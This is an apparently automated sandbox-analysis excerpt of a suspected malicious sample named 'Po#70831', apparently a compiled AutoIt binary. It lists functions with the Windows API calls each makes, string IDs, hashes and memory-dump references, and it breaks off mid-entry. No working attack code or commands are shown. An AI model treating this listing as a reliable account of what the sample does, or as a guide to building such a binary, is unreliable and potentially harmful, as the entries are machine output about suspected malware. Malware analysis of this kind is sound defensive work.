                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: d7ebe4b77617255808d1b3684fea8b72521169140007627e1e42e686937d984f
                                      • Instruction ID: e9715d8124b7f3ccedb6639e6abcd6fa25c2ce7841a86113348990866784f6b2
                                      • Opcode Fuzzy Hash: d7ebe4b77617255808d1b3684fea8b72521169140007627e1e42e686937d984f
                                      • Instruction Fuzzy Hash: 13319E35A006059FCB10DF68C485AEEBFB4FF55309F54846AE805CB292E770DD8ACB91
                                      Function 00523C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateMenu.USER32 ref: 00523C79
                                      • SetMenu.USER32(?,00000000), ref: 00523C88
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00523D10
                                      • IsMenu.USER32(?), ref: 00523D24
                                      • CreatePopupMenu.USER32 ref: 00523D2E
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00523D5B
                                      • DrawMenuBar.USER32 ref: 00523D63
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                      • String ID: 0$F
                                      • API String ID: 161812096-3044882817
                                      • Opcode ID: 76e1e19d60339ebd9aed611e4aef548821cfe07b36a6c494349494a5374796bb
                                      • Instruction ID: 9f07d0121b9ec8fa7e4f1fb2a12ba7db5cad4a2a33fbb7aca414cb06769fc1d6
                                      • Opcode Fuzzy Hash: 76e1e19d60339ebd9aed611e4aef548821cfe07b36a6c494349494a5374796bb
                                      • Instruction Fuzzy Hash: 4941A974A01209AFDB20CF64E884AAA7FB5FF4A340F140028F906A73A0D774EA14DF94
                                      Function 00523A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00523A9D
                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00523AA0
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00523AC7
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00523AEA
                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00523B62
                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00523BAC
                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00523BC7
                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00523BE2
                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00523BF6
                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00523C13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow
                                      • String ID:
                                      • API String ID: 312131281-0
                                      • Opcode ID: d491176c63039073924c32c89a78265e76e878d56aaa48673d392b8dab68fcff
                                      • Instruction ID: 3b7ead5607e3eca099b83a32450d841f62511ccf5233ce6abf953bcd9e7f76aa
                                      • Opcode Fuzzy Hash: d491176c63039073924c32c89a78265e76e878d56aaa48673d392b8dab68fcff
                                      • Instruction Fuzzy Hash: 38616A75900218AFDB20DFA8DC81EEE7BB8FF49700F140099FA15AB2A1C774AE45DB54
                                      Function 004C2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 004C2C94
                                        • Part of subcall function 004C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000), ref: 004C29DE
                                        • Part of subcall function 004C29C8: GetLastError.KERNEL32(00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000,00000000), ref: 004C29F0
                                      • _free.LIBCMT ref: 004C2CA0
                                      • _free.LIBCMT ref: 004C2CAB
                                      • _free.LIBCMT ref: 004C2CB6
                                      • _free.LIBCMT ref: 004C2CC1
                                      • _free.LIBCMT ref: 004C2CCC
                                      • _free.LIBCMT ref: 004C2CD7
                                      • _free.LIBCMT ref: 004C2CE2
                                      • _free.LIBCMT ref: 004C2CED
                                      • _free.LIBCMT ref: 004C2CFB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 20f77f828db867175d189d91a7cd85c4ff5b35ffc3f49022aad1e97b6958d7d8
                                      • Instruction ID: a36c4bd5c616d21fa3e7e0a2a5aca561b3139459b4178a0d33a45a178ea6d956
                                      • Opcode Fuzzy Hash: 20f77f828db867175d189d91a7cd85c4ff5b35ffc3f49022aad1e97b6958d7d8
                                      • Instruction Fuzzy Hash: 841119BA200008BFCB42EF55DA42EDD3BA5FF05344F4040AEFA485F222D6B5EE509B94
                                      Function 00491410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00491459
                                      • OleUninitialize.OLE32(?,00000000), ref: 004914F8
                                      • UnregisterHotKey.USER32(?), ref: 004916DD
                                      • DestroyWindow.USER32(?), ref: 004D24B9
                                      • FreeLibrary.KERNEL32(?), ref: 004D251E
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004D254B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                      • String ID: close all
                                      • API String ID: 469580280-3243417748
                                      • Opcode ID: 2b9e58267e7e9f1a83067e72623371a33ace7d434ea1f4dc933c45c8d2bbc126
                                      • Instruction ID: a7b939f37e8959676d703f53765e616b8e4e7a3659bb375b26338d136a799df5
                                      • Opcode Fuzzy Hash: 2b9e58267e7e9f1a83067e72623371a33ace7d434ea1f4dc933c45c8d2bbc126
                                      • Instruction Fuzzy Hash: C4D18B307012129FCB29EF55D5A9A29FBA0BF15704F1541AFE44A6B362CB38AC12CF59
                                      Function 00495BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowLongW.USER32(?,000000EB), ref: 00495C7A
                                        • Part of subcall function 00495D0A: GetClientRect.USER32(?,?), ref: 00495D30
                                        • Part of subcall function 00495D0A: GetWindowRect.USER32(?,?), ref: 00495D71
                                        • Part of subcall function 00495D0A: ScreenToClient.USER32(?,?), ref: 00495D99
                                      • GetDC.USER32 ref: 004D46F5
                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004D4708
                                      • SelectObject.GDI32(00000000,00000000), ref: 004D4716
                                      • SelectObject.GDI32(00000000,00000000), ref: 004D472B
                                      • ReleaseDC.USER32(?,00000000), ref: 004D4733
                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 004D47C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                      • String ID: U
                                      • API String ID: 4009187628-3372436214
                                      • Opcode ID: c25ef29686469e44026650fd2dba41aac64f07a60631b688a25937d7dd4d3306
                                      • Instruction ID: 55bccd812be99a42cedf8553c710da1cb4168fce5f99a3474122c53fcc6c64d1
                                      • Opcode Fuzzy Hash: c25ef29686469e44026650fd2dba41aac64f07a60631b688a25937d7dd4d3306
                                      • Instruction Fuzzy Hash: 6F71F134400205DFCF218F64C994ABA7FB1FF8A364F28426BE9565A3A6C338C842DF55
                                      Function 0050359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 005035E4
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • LoadStringW.USER32(00562390,?,00000FFF,?), ref: 0050360A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: LoadString$_wcslen
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 4099089115-2391861430
                                      • Opcode ID: 2f2c3e0db6c6524e293b9290b05d111674885c1a416f4d0308a919cd8971a240
                                      • Instruction ID: fe389e7ee3d9e43fdfe3a717eda73ff6842575507c05ea6291b0eb1d1473649d
                                      • Opcode Fuzzy Hash: 2f2c3e0db6c6524e293b9290b05d111674885c1a416f4d0308a919cd8971a240
                                      • Instruction Fuzzy Hash: CE517D71900209BACF14EBA5CC42EEDBF38FF15345F04412AF505721A1EB752B98DBA8
                                      Function 0050C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0050C272
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0050C29A
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0050C2CA
                                      • GetLastError.KERNEL32 ref: 0050C322
                                      • SetEvent.KERNEL32(?), ref: 0050C336
                                      • InternetCloseHandle.WININET(00000000), ref: 0050C341
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 3113390036-3916222277
                                      • Opcode ID: 4ae173e64c2697a51653aedeaa6c15e01f57ffa52b44d10e7a85f4979f3e3484
                                      • Instruction ID: da9ca24197708c912713e18e80ec473cae3300f20e7de52326ba042f5d784dd0
                                      • Opcode Fuzzy Hash: 4ae173e64c2697a51653aedeaa6c15e01f57ffa52b44d10e7a85f4979f3e3484
                                      • Instruction Fuzzy Hash: E8316DB1500604AFD7319FA48888AAF7FFCFF5A744B148A1EF48692281DB34DD099B61
                                      Function 004F989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004D3AAF,?,?,Bad directive syntax error,0052CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 004F98BC
                                      • LoadStringW.USER32(00000000,?,004D3AAF,?), ref: 004F98C3
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004F9987
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: HandleLoadMessageModuleString_wcslen
                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                      • API String ID: 858772685-4153970271
                                      • Opcode ID: 96f8efe744e1f0d07b814eb2e534b0889b31b692057567aa048871b144e338fb
                                      • Instruction ID: 8e1793bd0dba2150dc8d13106bccd352b6d4909b274ef1ce6ab7d8247bf7f3aa
                                      • Opcode Fuzzy Hash: 96f8efe744e1f0d07b814eb2e534b0889b31b692057567aa048871b144e338fb
                                      • Instruction Fuzzy Hash: 93218E3180021AABCF11AF90CC16EEE7B35BF25705F04442FB915660A2EB79AA28DB14
                                      Function 004F209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32 ref: 004F20AB
                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 004F20C0
                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004F214D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameParentSend
                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                      • API String ID: 1290815626-3381328864
                                      • Opcode ID: 936ffb6a0953afd683719fff5f9f34d993db7b11ef10e46b93c5335fb6cd708f
                                      • Instruction ID: b78dcc061141687fd85c572d62c5f9ee394a744fab8c00fe4d4de7fa0fbdf044
                                      • Opcode Fuzzy Hash: 936ffb6a0953afd683719fff5f9f34d993db7b11ef10e46b93c5335fb6cd708f
                                      • Instruction Fuzzy Hash: 09115C7628470BB9FE116620DE1BDFB7B9CDF15325B20011BFB05A40D2FEE9A80A551D
                                      Function 004CCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                      • String ID:
                                      • API String ID: 1282221369-0
                                      • Opcode ID: ed3357b5895808f11fd842881e60e192f4623e0b8c8818620b792b78b648acd3
                                      • Instruction ID: e8dd3bf105bf9cde961eacb5f9431b54915aa050fee10351e2b9830c7fa899d9
                                      • Opcode Fuzzy Hash: ed3357b5895808f11fd842881e60e192f4623e0b8c8818620b792b78b648acd3
                                      • Instruction Fuzzy Hash: AD614AB9A04300AFDBA1AFB998C1F6B7BA5AF01314F04426FF908973C1D6BD9D019758
                                      Function 005250D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00525186
                                      • ShowWindow.USER32(?,00000000), ref: 005251C7
                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 005251CD
                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 005251D1
                                        • Part of subcall function 00526FBA: DeleteObject.GDI32(00000000), ref: 00526FE6
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0052520D
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0052521A
                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0052524D
                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00525287
                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00525296
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                      • String ID:
                                      • API String ID: 3210457359-0
                                      • Opcode ID: 8c8ae562c8c830177ec8810a5690c2c8a8402ab60b59dd8a94a5d771c945b78b
                                      • Instruction ID: 895c05ef317ac617ccb78970e8cdf41bc0c8138644a9e296e9ef97c60e210117
                                      • Opcode Fuzzy Hash: 8c8ae562c8c830177ec8810a5690c2c8a8402ab60b59dd8a94a5d771c945b78b
                                      • Instruction Fuzzy Hash: 0151C134A50A29FEEF309F24EC49BA83F65FF17320F144012F6559A2E1E375A9A4DB40
                                      Function 004A8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 004E6890
                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 004E68A9
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004E68B9
                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 004E68D1
                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004E68F2
                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,004A8874,00000000,00000000,00000000,000000FF,00000000), ref: 004E6901
                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 004E691E
                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,004A8874,00000000,00000000,00000000,000000FF,00000000), ref: 004E692D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                      • String ID:
                                      • API String ID: 1268354404-0
                                      • Opcode ID: 9b6ee9f3bbe5e1623bbc16c825e4ed0fb6ee33a92bf26d534ee32b460e5f43cd
                                      • Instruction ID: 3d36e95f39c0ac1a45dcde8f32b2986850876aed6bb199d1fd06d9291a0b01ad
                                      • Opcode Fuzzy Hash: 9b6ee9f3bbe5e1623bbc16c825e4ed0fb6ee33a92bf26d534ee32b460e5f43cd
                                      • Instruction Fuzzy Hash: D151ABB0600209EFDB20DF25CC55BAA3BB5FF69351F10451EF902972A0DB78E951DB68
                                      Function 0050C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0050C182
                                      • GetLastError.KERNEL32 ref: 0050C195
                                      • SetEvent.KERNEL32(?), ref: 0050C1A9
                                        • Part of subcall function 0050C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0050C272
                                        • Part of subcall function 0050C253: GetLastError.KERNEL32 ref: 0050C322
